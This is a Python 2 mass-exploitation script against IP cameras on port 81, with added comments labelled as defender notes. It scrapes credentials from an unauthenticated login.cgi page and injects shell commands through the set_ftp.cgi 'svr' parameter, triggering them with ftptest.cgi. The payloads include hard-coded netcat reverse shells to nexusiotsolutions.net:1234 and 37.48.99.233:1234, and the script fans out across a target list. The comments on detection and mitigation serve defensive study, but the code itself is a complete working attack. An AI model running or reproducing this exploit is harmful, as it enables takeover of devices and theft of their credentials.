  1. import socket
  2. import sys
  3. import re
  4. import time
  5. from multiprocessing import Process
  6.  
def retrieve_credentials(host, port):
    # Purpose: connect to host:port, request "login.cgi" and scrape what the
    # script treats as a username/password pair out of the raw response.
    # Returns "username:password" on success, or 0 on any failure.
    #
    # Defender notes (Python 2 code, see the print statements in run()):
    #  - This is a credential-disclosure probe: it relies on the target's
    #    login.cgi page embedding credentials in a "var login ..." script
    #    assignment that is readable without authentication.
    #  - Detection: an unauthenticated request-line "GET login.cgi HTTP/1.0"
    #    (no leading "/", no Host header) followed within seconds by
    #    /set_ftp.cgi and /ftptest.cgi requests from the same source is the
    #    signature of this tool (see run()).
    #  - Mitigation: do not expose the device's web UI to untrusted networks,
    #    and never serve credentials inside page scripts.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # 5-second connect timeout; the bare except also swallows
        # KeyboardInterrupt/SystemExit.
        sock.settimeout(5)
        sock.connect((host, int(port)))
    except:
        sock.close()
        return 0
    # Retrieved credentials
    try:
        sock.send("GET login.cgi HTTP/1.0\n\n")
        resp = sock.recv(1024)
        # Double receive
        resp += sock.recv(1024)
    except:
        sock.close()
        return 0
    if not resp:
        sock.close()
        return 0
    # Everything from the first "var login" occurrence onward; if the marker
    # is absent find() returns -1 and only the last byte is kept.
    index = resp.find("var login")
    done = resp[index:]
    m = done.strip("\r\n")
    l = m.split(" ")
    if len(l) <= 1:
        sock.close()
        return 0
    try:
        # Second and third whitespace-separated tokens after the marker.
        # NOTE: the socket is not closed on this failure path.
        preuser = l[1].strip("var \r\n")
        prepass = l[2].strip("var \r\n")
    except:
        return 0
    # [11:] drops an 11-character prefix from each token — presumably the
    # variable name and "=" of the page's script assignment; then the
    # surrounding quote and ";" are stripped.
    username = preuser[11:].strip('";')
    password = prepass[11:].strip('";')
    sock.close()
    return username + ":" + password
  43.  
def submit_payload(host, port, payload):
    # Purpose: open a TCP connection to host:port, send `payload` once and
    # close without reading any response (fire-and-forget).
    # Returns 1 if the send call did not raise, 0 on connect/send failure.
    #
    # Defender note: because no response is read, a sensor will see a very
    # short-lived connection carrying a single HTTP request, immediately
    # followed by a second connection from the same source (submit_payload2).
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(5)
        sock.connect((host, int(port)))
    except:
        sock.close()
        return 0
    try:
        sock.send(payload)
    except:
        sock.close()
        return 0
    sock.close()
    return 1
  59.  
def submit_payload2(host, port, payload):
    # Purpose: like submit_payload, but after sending it keeps reading
    # 1024-byte chunks for up to ~30 units of time.clock() and returns 1 as
    # soon as the substring "ok" appears in a chunk. Returns 0 if the
    # connection closes, a recv raises (including the 5-second timeout), or
    # the time budget is exhausted without seeing "ok".
    #
    # Defender note: the "ok" check only inspects each chunk in isolation;
    # the tool uses this as its only success signal for the second request
    # (see run()).
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(5)
        sock.connect((host, int(port)))
    except:
        sock.close()
        return 0
    try:
        sock.send(payload)
    except:
        sock.close()
        return 0
    now = time.clock()
    while (time.clock() - now) < 30:
        try:
            resp = sock.recv(1024)
        except:
            break
        if not resp:
            break
        if "ok" in resp:
            sock.close()
            return 1
    sock.close()
    return 0
  86.  
def run(host, port):
    # Purpose: per-host driver. Pulls credentials via retrieve_credentials(),
    # then for each line of the local file "payload_file" sends a
    # /set_ftp.cgi request whose `svr` parameter wraps that line in
    # %24%28...%29 (i.e. "$(" ... ")"), followed by a /ftptest.cgi request
    # that is expected to trigger evaluation of the stored value.
    #
    # Defender notes:
    #  - Indicators: HTTP requests for /set_ftp.cgi with a `svr` value
    #    containing "%24%28" ... "%29", immediately followed by /ftptest.cgi,
    #    both carrying loginuse=/loginpas= (or loginps=) query parameters.
    #  - The first, hard-coded `payload` below is dead code (overwritten by
    #    the loop) but still an IoC: it embeds "nc nexusiotsolutions.net 1234
    #    -e /bin/sh", i.e. a reverse shell to that host on TCP/1234. The
    #    commented-out block at the end of this function names a second
    #    callback address, 37.48.99.233:1234.
    #  - Mitigation: keep the device's web interface off untrusted networks,
    #    apply vendor firmware fixes for the set_ftp.cgi command injection,
    #    and egress-filter devices so they cannot reach arbitrary hosts on
    #    1234/tcp.
    ret = retrieve_credentials(host, port)
    if ret == 0:
        return
    # Shadows the builtin `str` for the rest of this function.
    str = ret.split(":")
    username = str[0]
    password = str[1]
    if username != "" and password != "":
        print "Retrieved credentials %s:%s" % (str[0], str[1])
    else:
        return
    # Continue assuming we've retrieved the credentials successfully
    payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
    # One request per line of "payload_file"; the file handle is never closed.
    for i in open("payload_file", "r").readlines():
        line = i.strip("\r\n")
        payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginps=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
        ret = submit_payload(host, port, payload)
        if ret == 0:
            print "failed to send payload - %s (timeout?)" % (host)
            return
        payload2 = "GET /ftptest.cgi?loginuse=%s&loginps=%s HTTP/1.0\n\n" % (username, password)
        ret = submit_payload2(host, port, payload2)
        if ret == 0:
            print "failed to send payload - %s (timeout?)" % (host)
            return
    # Dead code: an earlier variant kept as a bare string expression.
    """payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
ret = submit_payload(host, port, payload)
if ret == 0:
print "Failed to send initial payload"
return
print "Sent initial payload, building & preparing to send the second"
payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
ret = submit_payload2(host, port, payload2)
if ret == 0:
print "Failed to send submit payload"
return"""
  123.  
if __name__ == "__main__":
    # Entry point: reads a local target list "goahead" (one "ip[:...]" per
    # line, only the part before the first ":" is used) and starts one
    # Process per host against port 81. Processes are never joined and there
    # is no concurrency limit, so the scan fans out as fast as the file is
    # read.
    #
    # Defender note: the fixed port 81 and the one-connection-per-host burst
    # pattern from a single source are useful for rate-based detection.
    for i in open("goahead", "r").readlines():
        line = i.strip("\r\n")
        info = line.split(":")
        ip = info[0]
        port = 81
        p = Process(target=run, args=(ip,port,))
        p.start()